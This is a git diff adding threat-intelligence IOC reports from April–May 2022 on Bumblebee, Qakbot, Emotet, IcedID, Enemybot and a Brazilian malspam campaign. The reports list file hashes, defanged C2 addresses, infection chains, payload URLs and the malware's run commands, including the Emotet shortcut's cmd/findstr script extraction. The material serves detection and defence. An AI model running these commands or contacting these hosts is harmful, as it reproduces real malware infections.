diff --git a/2022-04-05-IOCs-for-Bumblebee-and-Cobalt-Strike.txt b/2022-04-05-IOCs-for-Bumblebee-and-Cobalt-Strike.txt
new file mode 100644
index 0000000..667853e
--- /dev/null
+++ b/2022-04-05-IOCs-for-Bumblebee-and-Cobalt-Strike.txt
@@ -0,0 +1,37 @@
+2022-04-05 (MONDAY) - BUMBLEBEE INFECTION WITH COBALT STRIKE
+
+REFERENCE:
+
+- https://twitter.com/Unit42_Intel/status/1512146449345171459
+
+NOTES:
+
+- Bumblebee malware associated with threat actor EXOTIC LILY was reported by Google's Threat Analysis Group (TAG) in March 2022.
+
+- For more information, see: https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/
+
+- Was not able to recover Cobalt Strike binary from this infection example.
+
+ASSOCIATED MALWARE:
+
+- SHA256 hash: a3e023f9666dfacbbc028212682390de436a78e4291c512b0b9f022a05b138f8
+- File size: 2,555,904 bytes
+- File name: documents-0405-13.iso
+- File description: Malicious ISO file with Bumblebee malware
+
+- SHA256 hash: 9dfb32ed9b5756151623a8049eaa7785bf761601eb6c7165beff489cce31bb08
+- File size: 1,199 bytes
+- File name: documents.lnk
+- File description: Windows shortcut to run Blumblebee DLL
+- Shortcut: rundll32.exe setting.dll,IternalJob
+
+- SHA256 hash: 131f7e18bc3ea50cdcf74b618c24f5ae1b38594f8649d80538566b1cceeec683
+- File size: 2,502,144 bytes
+- File name: setting.dll
+- File description: Windows DLL for Bumblebee malware
+- Run method: rundll32.exe setting.dll,IternalJob
+
+TRAFFIC FROM AN INFECTED WINDOWS HOST:
+
+- 192.236.198[.]63 port 443 - 192.236.198[.]63 - Bumblebee HTTPS C2 traffic
+- 23.108.57[.]23 port 443 - cuhitiro[.]com - Cobalt Strike traffic
diff --git a/2022-04-12-IOCs-for-SpringShell-exploitation-by-Enemybot.txt b/2022-04-12-IOCs-for-SpringShell-exploitation-by-Enemybot.txt
new file mode 100644
index 0000000..a9ef8bb
--- /dev/null
+++ b/2022-04-12-IOCs-for-SpringShell-exploitation-by-Enemybot.txt
@@ -0,0 +1,74 @@
+2022-04-12 (TUESDAY) - SPRINGSHELL EXPLOITATION BY ENEMYBOT
+
+REFERENCE:
+
+- https://twitter.com/Unit42_Intel/status/1513951086356406279
+
+NOTE:
+
+- At least 62 samples of Gafgyt-based Linux botnet, Enemybot, exploiting the SpringShell vulnerability, were spotted on VirusTotal on 2022-04-11 and 2022-04-12.
+
+- The SHA256 file hashes are listed below.
+
+00bc1ce81f79089670a7d2956df112ff29ee86d51ecad0d7fb5012d54cbfaf4a
+01c758742f333d897b6d6fead725d91841f8a17bed6fb7fcc1226d7bd9a70c12
+07177233647e1ff382dde4803bc0651e5b052112a5450bd78858d945c4bc2e0b
+0801d8f5c028457b5bad66917d39d17471659eb522c5813f893c76bf4bc3148e
+12be4047b17c39993ea540b7bd857a665be2e205d455d0664dd4a96d763348ce
+12fd76f12e860d2931cc7e8b263933d9b82525f10116738fbd493c7666471cc5
+1416877edd6c4b18cbca4598b4c91b023113c51e9e8dbaef2266254727f223dc
+1adfc65c5ba75668d6f45e65ccb31100f9f8bf510435960b6038c7c7b746be62
+1c441e606233bbac68175731b0f35c0760a2da8e4002ef3ea36f341cf342cc79
+200c0d1c71d5c3faaba9ec5abcd1445b34c14fa66001557c11c574776b8baea7
+208ffbdc18d19de0691d523fc3acddc1390223d8f5a5e62f2526e26626086c38
+23e718def31c7a37bcbfae15a4eb0725e106f7b73b238d9ae42a19036e618dd7
+27b5e1f1bbde28fbd2d6d31f64a1b96c32d064a23f5832c7f6b04f32886c1929
+2c91a412ecedf9e6998997d90467398e2a55373c0b9b3395848184210705d7e6
+2ec4d6fad356e771ecc18491d931c3cf510e10d3ff49d8ab06e0da0e5eb8d120
+2f08cab642d4da5ab2a1d9ed6e816b5dd20bff21b10b7014d0ff19bde5b7890f
+336008e2b7f2bf194a44984b36d0594d03103e3636540273eed82c01af407001
+3b1bbec6edbaf072ef57fa257279497e74ebf80ff038d21a4043ac79656d7e28
+3d73aea855fc012e2a49a4c98f293dc4836a284ddf7481486b9948f6b6adbc00
+4485c594dce7c8444c2d9fbffc180a44795c98531d41ebd9a46f76ca052c8fa3
+4aa7b83b9d83db23b2a3dbfb6078a866928fc61655d0bc8ecc2fce5c3679c6b4
+4c31d578ad4bac892f0dcb307080f24196360765fe007c316c6f1878f9310d03
+4dc210da4efc55c32442a87eeeb3c45fc1e4001a99536503698708ff668ff262
+563cb8c26e7a5867f24f3ba21ad1d7cf923703e02788a96984c6a7f38f2d481e
+57594c0ebdf7365f6ccd6a576f32870e14bd87e627789de43626093e51d63050
+59845f9e4a5ad158c9021dbe7dcdec5ec7fe388549c01ca6207badfb24133d2b
+5b266c9bd119725dda27c91c08dd3b61659f2b91a487b420b21514f3235cbbb9
+5d38e81de505e6eeb887e10566ac09796db4bfeb9f4c13054c490064f1ff2eba
+5dc6318d8d50fb903ee4a79080769fd25a04ec6633cab32b0f890875c0780290
+5f6b65a372bfe982bca49e99f1ba17a57cbb5976a007bc07f1f645a2e9e6c22a
+631ddce47e2af455dcd985eb5f5e3fd8319b16b3db97b8ed915bba077d12ce49
+6381ea65b83ea2e2a4eed2c9f6fe6c2b0e31d4df2daf8201fa901782bfa5b019
+65dbdc04b1574683304457cd7c78541ead165201f89a1b2a7285313bc9b08bff
+72d34977b8f4b4734e89da4a1e8a9468173b69364ebf6150ab0fe3605123e98e
+73808dc4480bf696a4abc90c41b988886a6fa749c0b56098958471bb9c867af7
+81891ec2d391fb3ef95f04aa7c13cd99a7c4f939fec7ccddada2dc4811b78411
+8f8f61f95649f523e12533051dd55dd0d4da84da56873cb544dd12f01ea81ee0
+9482dccd63983272e610041d4bbf262b9e2ac23d721c097074e405fcd9a897c0
+97684ae157687ede7bf91bebe6d495da66e8496c0c273255a8e6134697994966
+98121e22dcb0b5ff2a05e49072b623ffd497b08c655ad200352b8fbfd94f4bc3
+9936afc821410d4ee8cc0a3d0bce6ef6b490392f4f13ae31f84a94c959a2fc03
+a00f249d4d86941b2b2d66c3431467ae8abac4ef8111c3b9d0f5b631e07d702b
+b11676e7e98d54c983b87a6e69054e70670169bdba0bf440eafcf06267b485b3
+b351a8b608f6e223ad8afd75d2f7121a4c7eec04ae1fd501619204bdac35a8ba
+b3f05948bdcff16464125fbb87bd6dab3b55510b8ed093abb37a7ba2b7e78297
+c1566f52e2f69008aa9afd6ea9a82972bdf2a51d90a7a85842858134ea74de40
+c3bff052096f85673dcbdf9038114d55b9a7b9b84b4049caee5612d50a8a734b
+c495527a844ddb6220ec8c333477e8d630b7552db38082a32f692f3b892ca9ce
+cadac6b80362ccc22e5f25ec1c57c43d66c893539306193a271ad78afa7d47c0
+d1f4dfba13d5407d367a847f213826f3a434e7af8f3daae482909473550c4e89
+d437b362e0bade3bdbb0e0e729b28b0068225671eda83df4309cea5898353289
+dd607c9a74ce0183b94b06e550f77814678c23cb11c67841e5a75c842c36c0ad
+e880481a7a40b7b13dc50241646d64a61814c11f0e7edb65006fc61da4f9f52a
+ea0762fbdd49c6be02ef533ca14c8f33303ce21f3510ab12b1164a2299480cfe
+edff8ce767dcec6300e05e7eb0712ab25673571503c2ac68690c7d257d2b2e29
+efc1fc9efefb96e31f887681bcdea337c3ab3312b4d55c7541b1e7f272a1bf41
+effddfe0e246b069f48e91e03dcd361998b773283834d9ebfd9703369bf663e4
+f0b828e78df7156fd9213947c1542e9aedcb797595da5374bce05cc5af5c8255
+f0cd9e36e2cdf45e59efab2761d606debd085fb7a6477b8be0e3cc813a279d42
+f566e89c45af2300900a522ab004bb1ac1a63301f4dac99e0de85ac5a2aa83f6
+f97d74ac49a75219ac40e8612a0ec0a829ed9daac2d913221115562c219c99b7
+fd07ef316187f311bec7d2ff9eb793cc3886463ebae9445c9f89903b66727832
diff --git a/2022-04-14-IOCs-for-aa-Qakbot-with-Cobalt-Strike.txt b/2022-04-14-IOCs-for-aa-Qakbot-with-Cobalt-Strike.txt
new file mode 100644
index 0000000..3d1b4cc
--- /dev/null
+++ b/2022-04-14-IOCs-for-aa-Qakbot-with-Cobalt-Strike.txt
@@ -0,0 +1,55 @@
+2022-04-14 (THURSDAY) - AA DISTRIBUTION QAKBOT (QBOT) WITH COBALT STRIKE
+
+REFERENCE:
+
+- https://twitter.com/Unit42_Intel/status/1514716895861256192
+
+INFECTION CHAIN:
+
+- email --> link --> zip --> extracted .msi file --> dropped Qakbot DLL --> Qakbot C2 --> Cobalt Strike
+
+NOTES:
+
+- Also known as TA577, aa distribution Qakbot started using .msi files in downloaded zip archives as of Monday 2022-04-11.
+- Reference: https://twitter.com/k3dg3/status/1513514251788464132
+- Reference: https://twitter.com/Max_Mal_/status/1513539551070937093
+
+- Saw the same Cobalt Strike C2 domain and IP address on Monday 2022-04-11 for 172.241.27[.]237 using kuxojemoli[.]com.
+- Reference: https://twitter.com/malware_traffic/status/1513556366346137605
+
+ASSOCIATED MALWARE:
+
+- SHA256: 5c3b39ec6ffbfe05ac0246d98d6ce7287de442896c90d24e256a03da21f3ada9
+- File size: 817,162 bytes
+- File location: hxxps://geobram[.]com/ist/iseerroaemtefspidnle
+- File location: hxxps://geobram[.]com/ist/NO_2950435796.zip 
+- File name: iseerroaemtefspidnle.zip
+- File description: ZIP archive downloaded from link in email
+
+- SHA256: 2b9861436d994bee6a332cbaf71a9fd6f157089062f414207c9effe84bf556e5
+- File size: 977,920 bytes
+- File name: 281.msi
+- File description: MSI file extracted from above ZIP archive
+
+- SHA256: f642fe6b372183af134c1c8cd5f806de37dcea27d6eab2ef53663d61795416e0
+- File size: 1,399,296 bytes
+- File location: C:\Users\[username]\AppData\Local\SetupTest\1.dll
+- File description: Windows DLL for Qakbot (aa distribution tag)
+- Run method: regsvr32.exe [filename]
+
+TRAFFIC TO DOWNLOAD THE INITIAL ZIP ARCHIVE:
+
+- 208.91.198[.]131 port 443 - hxxps://geobram[.]com/ist/iseerroaemtefspidnle
+- 208.91.198[.]131 port 443 - hxxps://geobram[.]com/ist/NO_2950435796.zip
+
+QAKBOT C2 TRAFFIC:
+
+- 47.158.25[.]67 port 443 - attempted TCP connections
+- 45.46.53[.]140 port 2222 - HTTPS traffic
+- port 443 - www.openssl[.]org - connectivity check (not inherently malicious)
+- 23.111.114[.]52 port 65400 - TCP traffic
+- 75.99.168[.]194 port 443 - HTTPS traffic
+
+COBALT STRIKE TRAFFIC:
+
+- 172.241.27[.]237 port 443 - kuxojemoli[.]com
diff --git a/2022-04-19-IOCS-for-infection-from-Brazil-malspam.txt b/2022-04-19-IOCS-for-infection-from-Brazil-malspam.txt
new file mode 100644
index 0000000..ac60668
--- /dev/null
+++ b/2022-04-19-IOCS-for-infection-from-Brazil-malspam.txt
@@ -0,0 +1,51 @@
+2022-04-19 (TUESDAY) - MALWARE INFECTION FROM BRAZIL EMAIL
+
+REFERENCE:
+
+- https://twitter.com/Unit42_Intel/status/1516878897341681665
+
+INFECTION CHAIN:
+
+- email --> link --> zip --> .msi file --> DLL run by legit EXE --> post-infection traffic
+
+EMAIL HEADERS:
+
+- Date: Tue, 19 Apr 2022 21:20:30 +0000 (UTC)
+- Return-Path: <root@mail51.notadobairro[.]com>
+- Received: from mail51.notadobairro[.]com (mail51.notadobairro[.]com [137.184.189[.]240])
+- Subject: Nota Fiscal Eletronica 8286498
+- From: prefeitura@prefeitura.sp.gov.br [spoofed sender]
+
+LINK FROM MESSAGE TEXT:
+
+- hxxps://projeto-nota[.]com/?cid=[recipient's email address]
+
+ASSOCIATED MALWARE:
+
+- SHA256 hash: 3a4da1e6bbd311133b1232f8b4080ebd2a9e747afd96f8c3eadde8f1dd949d84
+- File size: 14,940,993 bytes
+- File location: hxxp://download.kicks-ass[.]org/PREFEITURAfds.zip
+- File name: PREFEITURAfds.zip
+- File description: zip archive downloaded from link in email
+
+- SHA256 hash: de8dc757ae084e180d13d97afb93b64b678a786dc968657c85004b5a84fef10d
+- File size: 15,470,080 bytes
+- File name: ji89UHECQSfP.msi
+- File description: MSI file extracted from the above zip archive
+
+- SHA256 hash: 3847c039ec8f75424201032f288b86d79822cd9c993e9b9f51bd2f904eed4dfe
+- File size: 14,278,656 bytes
+- File location: C:\Users\[username]\AppData\Roaming\Segun‡a\Aplicativo\zlibai.dll
+- File description: Malware DLL installed from above MSI file
+- Run method: loaded by legitimate file intune.exe in the same directory
+
+INFECTION TRAFFIC:
+
+- 208.109.26[.]144 port 80 - projeto-nota[.]com - GET /?cid=[recipient's email address]
+- 20.226.20[.]129 port 80 - sgfghfhdghdd.doesntexist[.]org - GET /
+- 20.226.20[.]129 port 80 - sgfghfhdghdd.doesntexist[.]org - GET /nfe.jpg
+- 20.226.20[.]129 port 80 - sgfghfhdghdd.doesntexist[.]org - GET /loading2.gif
+- 20.226.20[.]129 port 80 - sgfghfhdghdd.doesntexist[.]org - GET /favicon.ico
+- 20.226.20[.]129 port 80 - gssfsfgf.scrapping[.]cc - GET /354386&tyGUuguyGUYGU435483962329378273892738973492380403UIGIUGGGG438746783/
+- 20.226.20[.]129 port 80 - download.kicks-ass[.]org - GET /PREFEITURAfds.zip
+- 20.226.20[.]129 port 80 - iofajfioshnguiosfui.from-pa[.]com - POST /novidades/inspecionando.php
diff --git a/2022-04-25-IOCs-for-Emotet-epoch4.txt b/2022-04-25-IOCs-for-Emotet-epoch4.txt
new file mode 100644
index 0000000..1e0ba3a
--- /dev/null
+++ b/2022-04-25-IOCs-for-Emotet-epoch4.txt
@@ -0,0 +1,92 @@
+2022-04-25 (MONDAY) - EMOTET EPOCH 4 MALSPAM WITH WINDOWS SHORTCUT (.LNK) ATTACHMENTS
+
+REFERENCE:
+
+- reference unavailable
+
+NOTES:
+
+- On Friday 2022-04-22, Emotet stopped sending Excel spreadsheets as attachments and began using Windows shortcut (.lnk) files.
+
+- The .lnk file can be directly attached to the emails, or they can be contained in a password-protected zip archive.
+
+- These shortcuts have embedded script appended to the file.
+
+- The shortcut command copys the embedded script to a .vbs file saved to and run from the victim's AppData\Local\Temp directory.
+
+ATTACHMENTS: .LNK FILES:
+
+- f1228e3fc8d14b670dcd05a73e9d8082c5468e7f869c04e4e2a192c24029cb0b  Electronic form 04.25.2022, USA.lnk
+- 4cfaec3d5afa0acd05aeea77cbd77f705659716849c4ffb1c00711e018e7e1d9  Electronic form 04.25.2022.lnk
+- de32b7042c9acd86b5f446c334a415f5f38df8dd71f74d0f826dc3e04e8b735c  Electronic form Dt 04.25.2022.lnk
+- e3a4e4b4fd779cb449b69d2831fe49e22c95eb917bc875a8ff9dea69699a2b75  Form Dt 04.25.2022.lnk
+- 193cf39b5c1d4174fbecc8ed34d476eab20129659e2f16a71341a53f3649819f  form 04.25.2022.lnk
+
+ATTACHMENTS: PASSWORD-PROTECTED ZIP ARCHIVES:
+
+- 4dfcc035699f72fe818d3862985043d7c9507c8fb41fa6daff6b040bd35f2fdb  Electronic form Dt 04.25.2022, United States.zip
+- 175926369c94fbbf586767836fdeb3d1eb23e0b6adaaa4f62d0437d7c1c3ffc5  Form 04.25.2022, US.zip
+- b4cef643571c26d7c96180c665250b3e2a64e6ff6957458c56dc8842640e20b9  form 04.25.2022, US.zip
+- 212b5544fd55f5d5060beec77d80ea600d29fbbce8cd3d6d7ab54af369e59363  INV 2022-04-25_1114, US.zip
+- 6bdac1eb612c6a9f7725a87d19d6a4e9f24012185d33cad66f0234cf0d572f07  INV 2022-04-25_1237, US.zip
+
+.LNK FILES EXTRACTED FROM THE ABOVE ZIP ARCHIVES:
+
+- 846a1548e1f1eb25c026060be4b132aef84c6e72d459ae4ba586e10bd3452e89  Electronic form Dt 04.25.2022, United States.lnk
+- 02eccb041972825d51b71e88450b094cf692b9f5f46f5101ab3f2210e2e1fe71  Form 04.25.2022, US.lnk
+- de494235193ae2144df12e3b5dddfee7f18fe155b71b8d816a010cf2ef95ed5a  form 04.25.2022, US.lnk
+- 406a50eb3bd3815a556e35015d65918b82cba4780c413f2028e3f8c346a5c283  INV 2022-04-25_1114, USA.doc.lnk
+- 19c4740ef48735d8fca435e54bb5ca4f0dea47c14d0a8ebf6f6278469b901eec  INV 2022-04-25_1237, United States.doc.lnk
+
+EXAMPLES OF WINDOWS SHORTCUT COMMANDS:
+
+- cmd.exe ..\..\Windows\system32\cmd.exe /v:on /c findstr "glKmfOKnQLYKnNs.*" "Electronic form 04.25.2022, USA.lnk"
+- cmd.exe ..\..\Windows\system32\cmd.exe /v:on /c findstr "glKmfOKnQLYKnNs.*" "Electronic form 04.25.2022.lnk"
+- cmd.exe ..\..\Windows\system32\cmd.exe /v:on /c findstr "glKmfOKnQLYKnNs.*" "Electronic form Dt 04.25.2022, United States.lnk"
+- cmd.exe ..\..\Windows\system32\cmd.exe /v:on /c findstr "glKmfOKnQLYKnNs.*" "Electronic form Dt 04.25.2022.lnk"
+- cmd.exe ..\..\Windows\system32\cmd.exe /v:on /c findstr "glKmfOKnQLYKnNs.*" "form 04.25.2022.lnk"
+- cmd.exe ..\..\Windows\system32\cmd.exe /v:on /c findstr "glKmfOKnQLYKnNs.*" "Form 04.25.2022, US.lnk"
+- cmd.exe ..\..\Windows\system32\cmd.exe /v:on /c findstr "glKmfOKnQLYKnNs.*" "form 04.25.2022, US.lnk"
+- cmd.exe ..\..\Windows\system32\cmd.exe /v:on /c findstr "glKmfOKnQLYKnNs.*" "Form Dt 04.25.2022.lnk"
+- cmd.exe ..\..\Windows\system32\cmd.exe /v:on /c findstr "glKmfOKnQLYKnNs.*" "INV 2022-04-25_1114, USA.doc.lnk"
+- cmd.exe ..\..\Windows\system32\cmd.exe /v:on /c findstr "glKmfOKnQLYKnNs.*" "INV 2022-04-25_1237, United States.doc.lnk"
+
+VBS SCRIPT APPENDED TO .LNK FILES FOR EMOTET:
+
+- SHA256 hash: c9182a9101d90a24fc6367d62e31abdd930b2c7f5e69d53d65468259ce1e295d
+- File size: 3,008 bytes
+- File location: C:\Users\[username]\AppData\Local\Temp\YlScZcZKeP.vbs
+
+URLS IN VBS SCRIPT TO RETRIEVE EMOTET DLL:
+
+- hxxps://creemo[.]pl/wp-admin/ZKS1DcdquUT4Bb8Kb/
+- hxxp://filmmogzivota[.]rs/SpryAssets/gDR/
+- hxxp://demo34.ckg[.]hk/service/hhMZrfC7Mnm9JD/
+- hxxp://focusmedica[.]in/fmlib/IxBABMh0I2cLM3qq1GVv/
+- hxxp://cipro[.]mx/prensa/siZP69rBFmibDvuTP1L/
+- hxxp://colegiounamuno[.]es/cgi-bin/E/
+
+EXAMPLE OF 64-BIT DLL FOR EMOTET:
+
+- SHA256 hash: d0c671e54b36dce0f652ef7fa8e18d609a89efff1a05b133d7c2cd536f65f15f
+- File size: 543,744 bytes
+- File location: C:\Users\[username]\AppData\Local\Kfichjg\cbun.zia
+- File type:  PE32+ executable (DLL) (GUI) x86-64, for MS Windows
+- File description: 64-bit DLL for Emotet
+- Run method: regsvr32.exe [filename]
+
+EMOTET C2 TRAFFIC:
+
+- 49.231.16[.]102 port 8080 - HTTPS traffic
+- 51.210.176[.]76 port 443 - HTTPS traffic
+- 91.207.181[.]106 port 8080 - HTTPS traffic
+- 93.104.209[.]56 port 8080 - HTTPS traffic
+- 131.100.24[.]199 port 7080 - HTTPS traffic
+- 138.197.147[.]101 port 443 - HTTPS traffic
+- 138.201.142[.]73 port 8080 - attempted TCP connections
+- 176.31.163[.]17 port 8080 - HTTPS traffic
+- 217.160.107[.]189 port 8080 - HTTPS traffic
+
+EMOTET SPAMBOT TRAFFIC:
+
+- various IP addresses over various TCP ports - encrypted SMTP traffic
diff --git a/2022-05-03-IOCs-for-Contact-Forms-Bumblebee-and-Cobalt-Strike.txt b/2022-05-03-IOCs-for-Contact-Forms-Bumblebee-and-Cobalt-Strike.txt
new file mode 100644
index 0000000..5508e4f
--- /dev/null
+++ b/2022-05-03-IOCs-for-Contact-Forms-Bumblebee-and-Cobalt-Strike.txt
@@ -0,0 +1,71 @@
+2022-05-03 (TUESDAY) - CONTACT FORMS CAMPAIGN --> BUMBLEBEE --> COBALT STRIKE
+
+REFERENCE:
+
+- https://twitter.com/Unit42_Intel/status/1521831026024239107
+
+CHAIN OF EVENTS:
+
+- Contact form-generated email --> link to URL at storage.googeapis.com --> ISO file download --> Bumblebee infection --> Cobalt Strike activity
+
+NOTES:
+
+- "Contact Forms" is a campaign that has distributed IcedID, Sliver, BazarLoader, and more recently Bumblebee malware.
+
+- This campaign uses a web site's contact form to email recipients messages with malicious links to download malware.
+
+- The Contact Forms campaign most often uses a DMCA violation notice that directs victims to a "Stolen Images Evidence" web page hosted on a URL at storage.googeapis.com.
+
+- In 2021 the Contact Forms campaign also used a "DDoS Attack Proof" theme.
+
+- An initial write-up about this campaign can be found at: https://www.microsoft.com/security/blog/2021/04/09/investigating-a-unique-form-of-email-delivery-for-icedid-malware/
+
+MALWARE RETRIEVED FROM AN INFECTED WINDOWS HOST:
+
+- SHA256 hash: c632b56628303f523b22a26231ae80836fed54df87c8a004f2d348d1b6f951b2
+- File size: 4,521,984 bytes
+- File name: StolenImages_Evidence.iso
+- File description: ISO file downloaded through link in contact forms email
+
+- SHA256 hash: 3c600328e1085dc73d672d068f3056e79e66bec7020be6ae907dd541201cd167
+- File size: 1,623 bytes
+- File location: StolenImages_Evidence.iso\documents.lnk
+- File description: Windows shortcut in the above ISO file
+- Windows shortcut: %windir%\system32.exe /c start
+rundll32.exe mkl2n.dll,KXlNkCkgFC
+
+- SHA256 hash: 0a9efce2cb38eb9e215d4ea308ccdc711659ab75b124dfd49561d6226c431ac2
+- File size: 3,023,872 bytes
+- File location: StolenImages_Evidence.iso\mkl2n.dll
+- File location: C:\ProgramData\96796b3c800e87fc\d99821d3530f702f.dll
+- File description: Bumblebee malware DLL
+- Run method: rundll32.exe [filename],KXlNkCkgFC
+
+- SHA256 hash: 330b74d26d0f25bd9b7cc147c9641241fea4a2a65965039c7a437ef739e51521
+- File size: 140 bytes
+- File location: C:\ProgramData\96796b3c800e87fc\d99821d3530f702f.vbs
+- File description: VBS file made persistent through scheduled task, used to run Bumblebee malware DLL
+
+MALWARE NOTE: 
+
+- No binaries for Cobalt Strike were found saved to disk during a forensic investigation on the infected Windows host.
+
+EXAMPLE OF LINK IN CONTACT FORM-GENERATED EMAIL FOR "STOLEN IMAGES EVIDENCE" PAGE:
+
+- port 443 - hxxps://storage.googleapis[.]com/sf796cw3zbj6nk.appspot.com/sh/f/pub/m/0/fileyxuMxCXbRc2e.html?f=308238708665803200
+
+EXAMPLES OF URLS RETRIEVED BY THE ABOVE PAGE THAT RETURN BASE64 TEXT TO GENERATE ISO FILE:
+
+- 172.67.183[.]217 port 443 - hxxps://baronrtal[.]com/images/logo.jpg
+- 172.67.168[.]3 port 443 - hxxps://bunadist[.]com/images/logo.jpg
+
+BUMBLEBEE C2 TRAFFIC:
+
+- 45.153.243[.]93 port 443 - 45.153.243[.]93 - HTTPS traffic
+
+COBALT STRIKE TRAFFIC:
+
+- 179.60.150[.]125 port 443 - HTTPS traffic
+- 172.93.201[.]12 port 443 - cevogesu[.]com - HTTPS traffic
+- 23.106.215[.]100 port 443 - titojukus[.]com - HTTPS traffic
+- 108.177.235[.]172 port 443 - xemigefav[.]com - HTTPS traffic
diff --git a/2022-05-10-IOCs-for-Contact-Forms-IcedID-with-Cobalt-Strike.txt b/2022-05-10-IOCs-for-Contact-Forms-IcedID-with-Cobalt-Strike.txt
new file mode 100644
index 0000000..37580e7
--- /dev/null
+++ b/2022-05-10-IOCs-for-Contact-Forms-IcedID-with-Cobalt-Strike.txt
@@ -0,0 +1,109 @@
+2022-05-10 (TUESDAY) - CONTACT FORMS CAMPAIGN PUSHES ICEDID (BOKBOT) WITH COBALT STRIKE
+
+REFERENCE:
+
+- original post unavailable
+- Repost at: https://twitter.com/cpardue09/status/1524481140622610432
+
+NOTES:
+
+- In recent weeks, the Contact Forms campaign has switched between pushing IcedID or pushing Bumblebee malware.
+- Threat actor behind the Contact Forms campaign is identified by Proofpoint as TA578.
+- More info at: https://www.proofpoint.com/us/blog/threat-insight/bumblebee-is-still-transforming
+
+INFECTION CHAIN:
+
+- Message generated by web site's contact form page --> link --> .iso --> IcedID --> Cobalt Strike
+
+EXAMPLES OF URLS FOR "STOLEN IMAGES EVIDENCE" PAGE:
+
+- hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/f9TOed0dsfi8I.html?d=013424360141997568
+- hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/f9TOed0dsfi8I.html?d=079839232761821960
+- hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/f9TOed0dsfi8I.html?f=683781869433531884
+- hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/fcVBtFOTc535o.html?d=767294819687278278
+- hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/file33vCIi4VowMA.html?l=233013603241570417
+- hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/file74UBbKNqO4XJ.html?h=322608764470150504
+- hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/file74UBbKNqO4XJ.html?l=170461110458299507
+- hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/file9FElTNKbCSuK.html?d=032781002493078383
+- hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/filehcA21fXJ3Pqq.html?d=747252265096336534
+- hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/filehcA21fXJ3Pqq.html?l=657889339028053050
+- hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/filer5SC4oHvKVpU.html?d=272216762893034065
+- hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/filer5SC4oHvKVpU.html?f=872038693564426236
+- hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/filer5SC4oHvKVpU.html?l=793720566165760989
+- hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/fileWrCADKEdgj2D.html?f=975205599657957920
+- hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/fileWrCADKEdgj2D.html?l=315799856865048946
+- hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/filex2o3u5r2JSLQ.html?d=41262147567753914
+- hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/filexGOO60PY9LvE.html?f=534830888378933219
+- hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/fkdOib7kTYN6s.html?h=686086524291489104
+- hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/fZ5cijKJ1mC0i.html?f=602448158755477572
+- hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/fZ5cijKJ1mC0i.html?f=690200262275133400
+
+URL CALLED BY "STOLEN IMAGES EVIDENCE" PAGE, RETURNED SCRIPT WITH BASE64 TEXT TO CREAT ISO FILE:
+
+- hxxps://olodaris[.]com/images/logo.jpg
+
+EXAMPLE OF DOWNLOADED ISO FILE AND ITS CONTENTS:
+
+- SHA256 hash: cc79f27ac41f863b9c9d8bf3dcc2738faa9d9691a1cf98c3f58351b20868cb05
+- File size: 2,097,152 bytes
+- File name: StolenImages_Evidence.iso
+- File description: ISO file downloaded from "Stolen Images Evidence" page
+
+- SHA256 hash: f7861ee8b3917e3746d44a769453334c9bf1b780213634ed9abd42f7873b0593
+- File size: 1,614 bytes
+- File name: documents.lnk
+- File description: Windows shortcut contained in the above .iso file
+- %windir%\system32\rundll32.exe olasius.dll,PluginInit
+
+- SHA256 hash: db91742b64c866df2fc7445a4879ec5fc256319e234b1ac5a25589455b2d9e32
+- File size: 590,336 bytes
+- File name: olasius.dll
+- File description: 64-bit DLL installer for IcedID
+- Run method: rundll32.exe [filename],PluginInit
+
+GZIP FILE RETRIEVED BY ICEDID INSTALLER TO CREATE LICENSE.DAT AND PERSISTENT ICEDID DLL:
+
+- SHA256 hash: 25c0746b4ac43ae65d5107c35659bf8f1d904fb3658d7c375ef1aa164a5cd200
+- File size: 917,404 bytes
+- File location: hxxp://yolneanz[.]com/
+- File type: gzip compressed data, was "Grass.txt", from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 4811912
+
+LICENSE.DAT USED TO RUN PERSISTENT ICEDID DLL:
+
+- SHA256 hash: dbe9743c9c57247cb9275a23a84909dd78aca59f584df62197bde07cb87bd1ed
+- File size: 342,186 bytes
+- File location: C:\Users\[username]\AppData\Roaming\HopeDescribe\license.dat
+- File type: data binary
+- Note: Directory named "HopeDescribe" is unique to this infection
+
+PERSISTENT ICEDID DLL:
+
+- SHA256 hash: dc08348cc6976740042ac2ee5942a48e56d1f2cd038f5907bad179a5c93d1b8a
+- File size: 574,464 bytes
+- File location: C:\Users\[username]\AppData\Roaming\[username]\[username]\wafuleff4.dll
+- File description: 64-bit DLL made persistent for IcedID infection
+- Run method: rundll32.exe [filename],#1 --ig="HopeDescribe\license.dat"
+
+TRAFFIC FROM AN INFECTED WINDOWS HOST:
+
+TRAFFIC FOR ISO FILE:
+
+- port 443 - hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/filehcA21fXJ3Pqq.html?l=657889339028053050
+- 46.173.215[.]54 port 443 - hxxps://olodaris[.]com/images/logo.jpg
+
